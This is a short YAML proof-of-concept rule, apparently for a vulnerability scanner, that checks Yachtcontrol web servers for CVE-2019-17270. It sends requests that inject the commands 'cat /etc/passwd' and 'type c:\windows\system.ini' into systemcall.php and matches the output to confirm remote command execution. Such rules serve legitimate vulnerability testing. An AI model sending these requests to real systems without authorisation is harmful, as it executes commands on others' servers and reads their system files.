name: poc-yaml-yachtcontrol-webapplication-cve-2019-17270
manual: true
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /pages/systemcall.php?command=cat%20/etc/passwd
            follow_redirects: false
        expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
    r1:
        request:
            cache: true
            method: GET
            path: /pages/systemcall.php?command=type%20c:\windows\system.ini
            follow_redirects: false
        expression: response.status == 200 && "for\\s16-bit\\sapp\\ssupport".bmatches(response.body)
expression: r0() || r1()
detail:
    author: 2husky
    links:
        - https://www.exploit-db.com/exploits/47760
    vulnerability:
        id: CT-107268
        level: critical
